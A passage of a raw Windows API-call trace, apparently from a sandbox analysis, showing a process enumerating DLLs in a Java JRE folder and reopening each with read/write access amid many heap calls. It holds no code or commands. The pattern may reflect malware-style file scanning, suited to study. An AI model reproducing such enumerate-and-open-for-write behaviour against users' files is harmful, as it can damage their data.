ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jp2ssv.dll", cAlternateFileName="")) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0093.005] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.005] AreFileApisANSI () returned 1 [0093.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll", lpUsedDefaultChar=0x0) returned 50 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0093.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.005] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.005] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.006] AreFileApisANSI () returned 1 [0093.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0093.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46ba8 [0093.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 50 [0093.006] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.006] GetFileType (hFile=0x360) returned 0x1 [0093.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0093.006] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.006] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.006] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.007] CloseHandle (hObject=0x360) returned 1 [0093.007] AreFileApisANSI () returned 1 [0093.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46208 [0093.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 50 [0093.007] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.007] GetFileType (hFile=0x360) returned 0x1 [0093.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0093.007] CloseHandle (hObject=0x360) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.008] AreFileApisANSI () returned 1 [0093.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0093.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x460b8 [0093.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll") returned 50 [0093.008] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2ssv.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39840)) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0093.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.008] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2d640, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jpeg.dll", cAlternateFileName="")) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0093.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0093.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0093.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.010] AreFileApisANSI () returned 1 [0093.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll", lpUsedDefaultChar=0x0) returned 48 [0093.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0093.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0093.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.010] AreFileApisANSI () returned 1 [0093.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0093.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 48 [0093.010] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.011] GetFileType (hFile=0x360) returned 0x1 [0093.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0093.011] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.011] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.011] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.012] CloseHandle (hObject=0x360) returned 1 [0093.012] AreFileApisANSI () returned 1 [0093.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 48 [0093.012] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.012] GetFileType (hFile=0x360) returned 0x1 [0093.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.012] CloseHandle (hObject=0x360) returned 1 [0093.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.013] AreFileApisANSI () returned 1 [0093.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0093.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71c38, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll") returned 48 [0093.013] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2d640)) returned 1 [0093.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0093.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 